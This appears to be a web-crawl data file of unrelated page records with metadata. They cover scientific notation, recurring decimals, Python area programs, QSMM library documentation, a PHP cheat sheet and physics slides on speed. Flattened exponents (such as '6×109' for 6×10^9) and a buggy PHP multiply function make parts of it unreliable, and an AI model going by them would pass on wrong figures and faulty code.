format.\n2. Figures stored in standard form can also be analyzed to reference numbers employing scientific notation by shifting one statistic to another notation. To convert a figure to scientific notation, raise the power of ten by one for each place the decimal digits are moved to the left.\n3. The standard form is a far superior alternative for swiftly addressing a value in a short amount of time. The scientific method, on the other hand, is preferable for learning the fundamentals of notation.\n4. Values documented in standard form can be compared to numbers written in scientific notation by transforming one quantity to another. Statistics in scientific notation can be displayed in a variety of ways. Another method to express the figure 6×109 is 6e+9.\n5. Before someone matches 3.4×107 and 4,500,000, they should modify 3.4×107 to 34,000,000 or 4,500,000 to 4.5×106. It is an example of a standard form. Whereas the world’s population is estimated to be around 5,000,000,000 people. 5*1,000,000,000 is the same as 5,000,000,000. The number 1,000,000,000 is equivalent to 109. This is an instance of scientific connotation. The number 1,000,000,000 is equivalent to 109. This is an instance of scientific connotation.\nOne request?\n\nI’ve put so much effort writing this blog post to provide value to you. It’ll be very helpful for me, if you consider sharing it on social media or with your friends/family. SHARING IS ♥️\n\nWant to save this article for later? Click the heart in the bottom right corner to save to your own articles box!", null, "" ]
[ null, "https://askanydifference.com/wp-content/plugins/chp-ads-block-detector/assets/img/icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9186757,"math_prob":0.9491417,"size":7198,"snap":"2023-40-2023-50","text_gpt3_token_len":1585,"char_repetition_ratio":0.17862107,"word_repetition_ratio":0.03829417,"special_character_ratio":0.23020284,"punctuation_ratio":0.12082445,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9810484,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-01T06:23:56Z\",\"WARC-Record-ID\":\"<urn:uuid:19ff3776-cb01-4f5f-ae3d-b41b1084eee9>\",\"Content-Length\":\"506402\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:05a4f318-5d0a-4327-83f6-4af22aaac8c7>\",\"WARC-Concurrent-To\":\"<urn:uuid:2ea2a097-831c-480e-a9ca-3b2b658254f9>\",\"WARC-IP-Address\":\"50.16.223.119\",\"WARC-Target-URI\":\"https://askanydifference.com/difference-between-standard-form-and-scientific-form/\",\"WARC-Payload-Digest\":\"sha1:53CHHDTNIVEOFLDC4TNXW3UBBLGVNEAG\",\"WARC-Block-Digest\":\"sha1:PYVEURWEQ3A6X3HXYPTTFQFJPELK4W7B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510781.66_warc_CC-MAIN-20231001041719-20231001071719-00059.warc.gz\"}"}
http://www.alamandamaths.com/number-and-algebra/real-number/recurring-decimals/
[ "# Recurring Decimals\n\n## Investigate terminating and recurring decimals (ACMNA184)\n\nLO:To understand recurring decimals\nKnow:\n\n• the structure of decimal numbers.\n\nUnderstand:\n\n• that recurring decimals are numbers that continue on forever.\n• that terminating decimals are decimal numbers that end\n\nDo:\n\n• I can find recurring decimals.\n\n## Terminating decimals are decimal numbers that stop or end", null, "## Recurring decimals are decimal numbers that repeat forever.", null, "## Common Recurring Decimals", null, "" ]
[ null, "https://i0.wp.com/www.alamandamaths.com/wp-content/uploads/2015/10/184914038.gif", null, "https://i2.wp.com/www.alamandamaths.com/wp-content/uploads/2015/10/846693107.gif", null, "https://i1.wp.com/www.alamandamaths.com/wp-content/uploads/2015/10/4964688_orig.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.66511256,"math_prob":0.9767319,"size":305,"snap":"2019-51-2020-05","text_gpt3_token_len":61,"char_repetition_ratio":0.22591361,"word_repetition_ratio":0.0,"special_character_ratio":0.19344263,"punctuation_ratio":0.14583333,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9918444,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,5,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-25T18:49:10Z\",\"WARC-Record-ID\":\"<urn:uuid:f3135d17-bfc9-4f04-9b0e-e8cb3e867ba6>\",\"Content-Length\":\"108577\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9897e45b-d81f-4d87-b181-3c6ebf1bb8d0>\",\"WARC-Concurrent-To\":\"<urn:uuid:daf5cb8e-fd31-43ff-8ddb-87b7e55e1a11>\",\"WARC-IP-Address\":\"166.62.28.136\",\"WARC-Target-URI\":\"http://www.alamandamaths.com/number-and-algebra/real-number/recurring-decimals/\",\"WARC-Payload-Digest\":\"sha1:53GIYSE56VS7CONSB3HZA2UWFU5CO5PV\",\"WARC-Block-Digest\":\"sha1:6YQFG6SZRFJAEYRMHWWQEIPCXSWJHDPK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251678287.60_warc_CC-MAIN-20200125161753-20200125190753-00223.warc.gz\"}"}
https://optimisticcoder.com/programming-examples-of-areas-in-python/
[ "# Programming Examples of Areas in Python: Important Examples\n\nHere are some programming examples of areas in Python language to give you an idea of programming works to calculate areas in python and which syntax is used to perform any specific task. Examples will be provided in sequential order to get you an easy understanding of the language. So, as usual, first, let’s start by calculating the area of the circle.\n\n## Calculating Areas in Python Language\n\n### 1. Area of Circle in Python\n\n```radius = int(input(\"Enter Radius of the Circle: \"))\narea = 3.14 * radius ** 2\nprint(\"Area of Circle: {0: .2f} \".format (area))\n```\n\n#### Output:\n\nEnter Radius of the Circle: 4\nArea of Circle: 50.24\n\n### 2. Area of Triangle in Python\n\n```b = int(input (\"Enter Breadth: \"))\nh = int(input(\"Enter Height: \"))\narea =(b * h) / 2\nprint(\"Area of triangle : {0:.2f} \".format (area))\n```\n\n#### Output:\n\nEnter Height: 20\nArea of triangle : 150.00\n\n### 3. Area of Equilateral Triangle in Python\n\n```import math\nside = int(input(\"Enter the length of Side: \"))\narea = (math.sqrt(3) * (side ** 2)) / 4\nprint(\"Area of Equilateral triangle: {0: .2f} \".format (area))\n```\n\n#### Output:\n\nEnter the length of Side: 5\nArea of Equilateral triangle: 10.83\n\n### 4. Area of Rectangle in Python\n\n```len = int (input(\"Enter length of Rectangle: \"))\nbre= int(input(\"Enter breadth of Rectangle: \"))\narea = len * bre\nprint(\"Area of Rectangle:\", area)\n```\n\n#### Output:\n\nEnter length of Rectangle: 5\nArea of Rectangle: 30\n\n### 5. Area of Square in Python\n\n```side = int(input(\"Enter length of Side: \"))\narea = side ** 2\nprint(\"Area of Square\", area)\n```\n\n#### Output:\n\nEnter length of Side: 8\nArea of Square 64\n\n### 6. Area of Rhombus in Python\n\n```print(\"Enter values of diagonals: \")\nd1 = int(input(\"D1: \"))\nd2 = int(input( \"D2: \"))\narea = (d1 * d2) / 2\nprint(\"Area of Rhombus:\", area)\n```\n\n#### Output:\n\nEnter values of diagonals:\nD1: 15\nD2: 21\nArea of Rhombus: 157.5\n\n### 7. Area of Pentagon in Python\n\n```from math import sqrt\nside = int(input(\"Enter length of Side: \"))\narea = (sqrt(5 * (5 + 2 * (sqrt(5)))) * side * side) / 4\nprint(\"Area of Pentagon {0: .2f} \".format (area))\n```\n\n#### Output:\n\nEnter length of Side: 15\nArea of Pentagon 387.11\n\n### 8. Area of Hexagon in Python\n\n```from math import sqrt\nside = int(input(\"Enter length of Side: \"))\narea = (3 * sqrt(3) * side * side) / 2\nprint(\"Area of Hexagon {0:.2f} \".format (area))\n```\n\n#### Output:\n\nEnter length of Side: 3\nArea of Hexagon 23.38\n\n### 9. Area of Heptagon in Python\n\n```side = int(input(\"Enter the value of Side: \"))\napo = float(input( \"Enter the value of Apothem: \"))\nperi = 7 * side\narea = (peri * apo) / 2\nprint(\"Area of Heptagon: {0: .2f} \".format(area))\n```\n\n#### Output:\n\nEnter the value of Side: 7\nEnter the value of Apothem: 7.4\nArea of Heptagon: 181.30\n\n### 10. Area of Regular Octagon in Python\n\n```from math import sqrt\nside = int(input(\"Enter length of Side: \"))\narea = 2 * (1 + sqrt(2)) * side ** 2\nprint(\"Area of Regular Octagon: {0:.2f} \".format(area))\n```\n\n#### Output:\n\nEnter length of Side: 3\nArea of Regular Octagon: 43.46\n\n### 11. Area of Trapezoid in Python\n\n```print(\"Enter values for bases: \")\nb1 = int(input(\"B1: \"))\nb2 = int(input( \"B2: \"))\nh = int(input(\"Enter height (H): \"))\narea = ((b1 + b2) *h) / 2\nprint(\"Area of Trapezoid\", area)\n```\n\n#### Output:\n\nEnter values for bases:\nB1: 5\nB2: 10\nEnter height (H): 14\nArea of Trapezoid 105.0\n\n## Conclusion\n\nI hope I have given you all the important programming examples of areas in Python language. One important tip for all python beginners, Please take care of indentation!!. Do you agree with me? Please leave a comment. Hope you like the content and the information shared by me. If you find this post knowledgeable and learned something new and interesting today then please share this post with your friends and family members and help the Optimistic Coder to spread informational contents. Thank You." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.70592636,"math_prob":0.96353894,"size":3737,"snap":"2023-40-2023-50","text_gpt3_token_len":1099,"char_repetition_ratio":0.18644522,"word_repetition_ratio":0.113149844,"special_character_ratio":0.32271877,"punctuation_ratio":0.16558862,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9988736,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T22:45:44Z\",\"WARC-Record-ID\":\"<urn:uuid:62c774f5-c0b0-437c-abec-054963e63fdc>\",\"Content-Length\":\"107966\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dbaa75f6-50af-4bd8-a5a5-3c7244d45d9a>\",\"WARC-Concurrent-To\":\"<urn:uuid:dd534a2a-7004-4d49-9f75-27a82227e843>\",\"WARC-IP-Address\":\"185.210.145.93\",\"WARC-Target-URI\":\"https://optimisticcoder.com/programming-examples-of-areas-in-python/\",\"WARC-Payload-Digest\":\"sha1:NBU7RAEBCDO2EBEWMU52X4B4DZIJKBEF\",\"WARC-Block-Digest\":\"sha1:7CQNRUV75LOMZVJSQPI4RZGENT3YZLYJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100308.37_warc_CC-MAIN-20231201215122-20231202005122-00060.warc.gz\"}"}
https://qsmm.org/doc/qsmm-man.html-node/Setting-Instruction-Classes-Weights.html
[ "Next: , Previous: , Up: Executing a Multinode Model   [Contents][Index]\n\n#### 4.3.5 Setting Instruction Classes Weights\n\nIf the field `dont_use_instr_class_weights` of `qsmm_desc_s` structure passed to the function `qsmm_create` when creating a multinode model is zero, and the instruction emitting engine is a small actor, you can assign weights to instruction classes executed5 by a node of this model. The weights are multipliers for calculated probabilities of selection of those instruction classes by the instruction emitting engine assigned to its output signals by the function `qsmm_set_actor_sig_weight`. The function `qsmm_node_create_v2` initializes to 1 the weights of all instruction classes executable by a node.\n\nWarning: changing the weights of instruction classes leads to ill-defined behavior of built-in functions for computing the relative probability of an output signal by the instruction emitting engine. Therefore, avoid changing the weights of instruction classes if you use those built-in functions. See Number of Output Signals, for the explanation why the behavior becomes ill-defined.\n\nYou can use the following functions to query or set the weight of an instruction class specified by its index uniquely identifying the instruction class in an instruction class set.\n\nFunction: int qsmm_get_instr_class_weight (qsmm_t model, qsmm_sig_t node, qsmm_sig_t instr_class, double *weight_p)\n\nThis function retrieves the weight of an instruction class executable by a node of a multinode model. The argument node specifies the identifier of this node. The argument instr_class specifies the index of this instruction class in the instruction class set of this node. If weight_p is not `NULL`, the function sets *weight_p to retrieved weight.\n\nThe function returns a non-negative value on success or a negative error code on failure. Currently, the function can return the following error codes.\n\n`QSMM_ERR_NOTFOUND`\n\nA node with identifier node does not exist.\n\n`QSMM_ERR_INVAL`\n\nThe argument instr_class is greater than or equal to the number of instruction classes in the instruction class set of the node.\n\n`QSMM_ERR_NOTSUP`\n\nThe multinode model does not support assigning weights to instruction classes.\n\nFunction: int qsmm_set_instr_class_weight (qsmm_t model, qsmm_sig_t node, qsmm_sig_t instr_class, double weight)\n\nThis function sets to weight the weight of an instruction class executable by a node of a multinode model. The argument node specifies the identifier of this node. The argument instr_class specifies the index of this instruction class in the instruction class set of this node.\n\nThe function returns a non-negative value on success or a negative error code on failure. Currently, the function can return the following error codes.\n\n`QSMM_ERR_NOTFOUND`\n\nA node with identifier node does not exist.\n\n`QSMM_ERR_INVAL`\n\nThe argument weight is negative or not finite, or instr_class is greater than or equal to the number of instruction classes in the instruction class set of the node.\n\n`QSMM_ERR_NOTSUP`\n\nThe multinode model does not support assigning weights to instruction classes.\n\n`QSMM_ERR_NOMEM`\n\nThere was not enough memory to perform the operation.\n\nUse the following functions to query or set the weight of an instruction class specified by its name consisting of an instruction meta-class name and optional text parameters of this instruction class.\n\nFunction: int qsmm_get_instr_class_weight_by_name_f (qsmm_t model, qsmm_sig_t node, double *weight_p, const char *fmt, ...)\nFunction: int qsmm_set_instr_class_weight_by_name_f (qsmm_t model, qsmm_sig_t node, double weight, const char *fmt, ...)\n\nThe function `qsmm_get_instr_class_weight_by_name_f` retrieves the weight of an instruction class executable by a node of a multinode model. If weight_p is not `NULL`, the function sets *weight_p to retrieved weight. The function `qsmm_set_instr_class_weight_by_name_f` sets to weight the weight of an instruction class executable by a node of a multinode model.\n\nThe argument model specifies a multinode model handle. The argument node specifies a node identifier. The argument fmt and subsequent arguments interpreted as in the function `printf` specify an instruction class name: a sequence of zero or more whitespace characters, an instruction meta-class name optionally followed by a sequence of one or more whitespace characters and the text parameters of this instruction class, and a sequence of zero or more whitespace characters.\n\nBefore searching the instruction class in the instruction class set of this node, the functions convert the formatted name to the canonical form: the instruction meta-class name optionally followed by the space character and the text parameters of this instruction class converted to their canonical form according to rules described in Setting Text Instruction Parameters.\n\nThe functions return a non-negative value on success or a negative error code on failure. Currently, the functions can return the following error codes.\n\n`QSMM_ERR_NOTFOUND`\n\nA node with identifier node does not exist, or the instruction class not found in the instruction class set of this node.\n\n`QSMM_ERR_INVAL`\n\nThe argument weight is negative or not finite, or an instruction class name has invalid format.\n\n`QSMM_ERR_NOTSUP`\n\nThe multinode model does not support assigning weights to instruction classes.\n\n`QSMM_ERR_ILSEQ`\n\nUnable to convert an instruction class name to a wide string according to a current locale.\n\n`QSMM_ERR_NOMEM`\n\nThere was not enough memory to perform the operation.\n\nFor example, to set the weight of ‘move north’ instruction class to 0 to disable moving an agent in the north direction, use a line of code like this:\n\n```qsmm_set_instr_class_weight_by_name_f(qsmm,node,0,\"move north\");\n```\n\nUse the following function to set to the same value the weights of all instruction classes derived from an instruction meta-class for a node.\n\nFunction: int qsmm_set_instr_meta_class_weight (qsmm_t model, const char *instr_meta_class_name, qsmm_sig_t node, double weight)\n\nThis function sets the weights of all instruction classes derived from an instruction meta-class instr_meta_class_name and executable by a node of a multinode model to weight divided by the number of those instruction classes. The argument node specifies the identifier of this node.\n\nThe function returns a non-negative value on success or a negative error code on failure. Currently, the function can return the following error codes.\n\n`QSMM_ERR_NOTFOUND`\n\nThe instruction meta-class instr_meta_class_name not found, or a node with identifier node does not exist, or there are no instruction classes derived from that instruction meta-class in the instruction class set of this node.\n\n`QSMM_ERR_INVAL`\n\nThe argument weight is negative or not finite.\n\n`QSMM_ERR_TYPE`\n\nAn entity named instr_meta_class_name is not an instruction meta-class. The entity is an instruction class set.\n\n`QSMM_ERR_NOTSUP`\n\nThe multinode model does not support assigning weights to instruction classes.\n\n`QSMM_ERR_NOMEM`\n\nThere was not enough memory to perform the operation.\n\nThe function `qsmm_node_call_default` sets the weights of output signals of instruction emitting engine equal to the weights of instruction classes executable by a node on transferring control to it—calling the node or returning control to it from another node. The aforementioned functions for setting the weights of instruction classes immediately update the weights of corresponding output signals of instruction emitting engine if the model instance exists, the node call stack is not empty, and the identifier of a currently executed node is equal to node.\n\n#### Footnotes\n\n##### (5)\n\nHere and below, “the invocation/execution of an instruction class” means “the invocation/execution of an instruction belonging to an instruction class.”\n\nNext: , Previous: , Up: Executing a Multinode Model   [Contents][Index]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82480705,"math_prob":0.77621907,"size":7243,"snap":"2022-27-2022-33","text_gpt3_token_len":1406,"char_repetition_ratio":0.23097113,"word_repetition_ratio":0.44753945,"special_character_ratio":0.18086429,"punctuation_ratio":0.07896924,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.954372,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T18:55:42Z\",\"WARC-Record-ID\":\"<urn:uuid:c494faf5-5d0c-4a93-aa33-0f6e2514928d>\",\"Content-Length\":\"14532\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6d335549-d57e-414a-bf0e-13e274974cca>\",\"WARC-Concurrent-To\":\"<urn:uuid:e76887cf-b106-4a82-8582-28fc202c62f2>\",\"WARC-IP-Address\":\"168.119.91.111\",\"WARC-Target-URI\":\"https://qsmm.org/doc/qsmm-man.html-node/Setting-Instruction-Classes-Weights.html\",\"WARC-Payload-Digest\":\"sha1:XQM456PLHZ2TJRXI6FNLWR5GLWMRC7SL\",\"WARC-Block-Digest\":\"sha1:DTEIXUJAJFLLS36MC3YPIOHOTCJN5VJY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103877410.46_warc_CC-MAIN-20220630183616-20220630213616-00557.warc.gz\"}"}
https://www.cheatography.com/mkpeacock/cheat-sheets/php-fundamentals/
[ "# PHP Fundamentals Cheat Sheet by mkpeacock\n\nFundamentals of PHP\n\n### Classes and Objects\n\n class SomeClass {  ­ ­ ­ ­private \\$property;  ­ ­ ­ ­public \\$anoth­erP­rop­erty;  ­ ­ ­ ­pro­tected \\$yetAn­oth­erP­roperty = null;  ­ ­ ­ ­public function __cons­tru­ct(­\\$ar­g=null) {  ­ ­ ­ ­\\$th­is-­>pr­operty = \\$arg; } public function someMe­thod() {  ­ ­ ­ echo “Hi”; } public function getPro­perty() {  ­ ­ ­ ­return \\$this-­>pr­operty; } public function setPro­perty( \\$p ) {  ­ ­ ­ ­\\$th­is-­>pr­operty = \\$p; } } \\$myObject = new SomeClass( “123” ); echo \\$myObj­ect­->g­etP­rop­erty(); // 123 \\$myObj­ect­->p­rop­erty; // ERROR:­private\n\n### Variables\n\n \\$varia­ble­Name; \\$varia­bleName = \"Some String­\"; \\$varia­bleName = 'Some String'; \\$varia­bleName = strtou­ppe­r('­text'); \\$varia­bleName = 5; \\$variable = \"Some {\\$othe­rVa­riable} info\"; echo \\$varia­ble­Name; // output \\$newVar = \\$var1 . \\$var2; // concat­enation\n\n### Functions\n\n function multip­ly(­\\$arg1, \\$arg2) {  ­ ­ ­ ­return \\$arg * \\$arg2; } \\$param = 4; \\$param2 = 8; \\$answer = multip­ly(­\\$param, \\$param2);\n\n### Control Structure: IF\n\n // if something is true do something else if( \\$something == true ) {  ­ ­ ­ ­doS­ome­thi­ngE­lse(); } elseif( \\$something == false ) {  ­ ­ ­ // however, if something is false, do something  ­ ­ ­ ­doS­ome­thi­ng(); } else {  ­ ­ ­ // otherwise, lets do nothing  ­ ­ ­ ­doN­oth­ing(); }\n\n### Control Structure: Loops\n\n foreach( \\$myArray as \\$key => \\$value ) {  ­ ­ ­ echo “My array has the value {\\$value} stored against the key {\\$key}­\n”; } while( someCo­ndition == true ) {  ­ ­ ­ echo ‘hello’; }\n\n### Numerical Operations\n\n Addition \\$variable = \\$variable + 5; Subtra­ction \\$variable = \\$variable - 5; Multip­lic­ation \\$variable = \\$variable * 5; Division \\$variable = \\$variable / 5;\n\n### Arrays\n\n Create \\$myArray = array(); Push into \\$myArray[] = \"­Som­eth­ing­\"; Push to associ­ative \\$myArr­ay[­'key'] = \"­Val­ue\"; Create numeric \\$myArray = array(­'va­lue', 'value2'); Create associ­ative \\$a = array(­'ke­y'=­>'v­al'); Print from numeric echo \\$myArr­ay; Print from associ­ative echo \\$myArr­ay[­'key']; Associ­ative arrays Keys are strings Numeric arrays Keys are numbers: 0,1,2,3,4\n\n### Control Structure: Switch\n\n switch( \\$someV­ariable ) {  ­ ­ ­ case 1:  ­ ­ ­ ­ ­ ­ ­ echo “Some variable equals 1”;  ­ ­ ­ ­ ­ ­ ­ ­break;  ­ ­ ­ case “cheese”  ­ ­ ­ ­ ­ ­ ­ echo “Some variable equals cheese”;  ­ ­ ­ ­ ­ ­ ­ ­break;  ­ ­ ­ ­def­ault:  ­ ­ ­ ­ ­ ­ ­ echo “No idea”;  ­ ­ ­ ­ ­ ­ ­ ­break; }", null, "1 Page\n//media.cheatography.com/storage/thumb/mkpeacock_php-fundamentals.750.jpg\n\nPDF (recommended)", null, "Sergey, 13:00 17 Sep 15\n\nThere is a mistake in multiline comment. Should be /* */" ]
[ null, "https://media.cheatography.com/storage/thumb/mkpeacock_php-fundamentals.750.jpg", null, "https://www.cheatography.com/images/spacer.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5090435,"math_prob":0.868783,"size":2797,"snap":"2019-51-2020-05","text_gpt3_token_len":756,"char_repetition_ratio":0.13175796,"word_repetition_ratio":0.0,"special_character_ratio":0.28208795,"punctuation_ratio":0.18518518,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9563181,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-11T05:06:28Z\",\"WARC-Record-ID\":\"<urn:uuid:fc8c51de-8955-419d-9cd2-c8575668ab04>\",\"Content-Length\":\"76128\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9bd83e39-c7b4-465a-9341-fe84d0a8cf61>\",\"WARC-Concurrent-To\":\"<urn:uuid:8ba11444-52f7-46b3-989c-227aae8cd47b>\",\"WARC-IP-Address\":\"178.79.154.177\",\"WARC-Target-URI\":\"https://www.cheatography.com/mkpeacock/cheat-sheets/php-fundamentals/\",\"WARC-Payload-Digest\":\"sha1:23DKW6SJCV62WAQBLIFV54CBWA5SZSBQ\",\"WARC-Block-Digest\":\"sha1:VTBZYLSJ2UHD7KOL4K6O4OCRGYTRGA4J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540529955.67_warc_CC-MAIN-20191211045724-20191211073724-00054.warc.gz\"}"}
https://usmam.org/what-is-the-rate-at-which-an-object-moves/
[ "## Presentation top top theme: \"1) Speed: the price at which an object moves or the rate of adjust of position It depends on distance and also time.\"— Presentation transcript:\n\nYou are watching: What is the rate at which an object moves\n\n1", null, "2", null, "3", null, "4 1) Speed: the rate at which things moves or the price of adjust of place It relies on distance and time.", null, "5 2) mean speed is discovered by splitting the complete distance by the full time. Speed= distance time", null, "6", null, "7 3) consistent means “does not change” so constant speed is rate that does no change. Favor cruise regulate in a car!!", null, "8 due to the fact that speed is a ratio of street over time, the systems for speed are distance units over time units.", null, "9 3.2 rate vs. Time graphs The place vs. Time graph has position top top the y-axis and also time on the x-axis. I m sorry runner has the fastest consistent speed?", null, "10", null, "11 4) Velocity is speed in a direction. Ex: 55 m/s north If you adjust speed, OR you readjust direction, you’ve changed velocity", null, "12 stop check: i m sorry of the complying with are velocity and which room speed? a) 25 m/sforward b) 1500 km/h c) 55 m/h south d) 35 m/s increase", null, "13 5) Acceleration is the rate of readjust of speed – that is the adjust in speed split by the readjust in time.  acceleration can be rise in velocity or a to decrease in velocity OR a readjust in direction", null, "14 6) If there is no readjust in speed, however there is a readjust in direction acceleration has actually occurred.", null, "15 3.3 Acceleration and direction A vehicle driving around a curve in ~ a continuous speed is accelerating because the direction is changing.", null, "16 7) If the worth for acceleration is positive, the thing is speeding up. If the worth is negative the thing is slowly down. (also called deceleration)", null, "17 You do the math: 1) What is the speed of things that travel 40 meter in 2 seconds? 2) What is the rate of an object that travels 50 meter in 100 seconds? 3) How fast is a car accelerating when it increases from 50 mph come 60 mph in ten seconds?", null, "18 3.3 Acceleration and also motion graphs The place vs. Time graph reflects acceleration more clearly. This graph is a curve when there is acceleration.", null, "19 8) things is in cost-free fall if it is speeding up due to the force of gravity and no other pressures are acting on it. Objects in free fall on earth accelerate downward. (that method they get much faster as they fall)", null, "20 9) fallout’s objects rise their rate by 9.8 m/s every second, or 9.8 m/s 2 ; this is their acceleration as result of gravity.", null, "21 10) A projectile is an object moving under the influence of just gravity. A moving soccer sphere is an example of a projectile.", null, "22 EXTRAS!", null, "23 3.2 The place vs. Time graph place vs. Time data tells you the runner’s position at various points in time. The runner is at 50 meter after 10 sec., 100 meter after 20 sec. And also 150 meters at 30 sec.", null, "24 3.2 Graphs display relationships A good way to display a relationship between two variables is to usage a graph. A graph renders it easy to view if alters in one variable reason changes in the other variable (the effect).", null, "25 3.2 slope You have the right to use position vs. Time graphs to quickly compare the speed of different objects. A steeper line on a position vs. Time graph means a much faster speed.", null, "26 3.2 speed vs.\n\nSee more: Where To Buy Poppers In Manhattan, Best Poppers In Manhattan, Ny\n\nTime graphs this graphs each display the very same event. What distinctions do girlfriend notice?", null, "" ]
[ null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_1_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_2_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_3_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_4_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_5_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_6_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_7_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_8_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_9_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_10_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_11_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_12_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_13_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_14_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_15_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_16_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_17_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_18_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_19_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_20_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_21_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_22_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_23_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_24_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_25_1834_700.jpg", null, "https://usmam.org/what-is-the-rate-at-which-an-object-moves/imager_26_1834_700.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9316376,"math_prob":0.9578542,"size":3456,"snap":"2022-27-2022-33","text_gpt3_token_len":838,"char_repetition_ratio":0.13209733,"word_repetition_ratio":0.010869565,"special_character_ratio":0.25462964,"punctuation_ratio":0.098648645,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96149915,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-01T17:08:07Z\",\"WARC-Record-ID\":\"<urn:uuid:56d0d0a9-d6dc-406b-a927-62f33556c181>\",\"Content-Length\":\"16411\",\"Content-Type\":\"application/http; 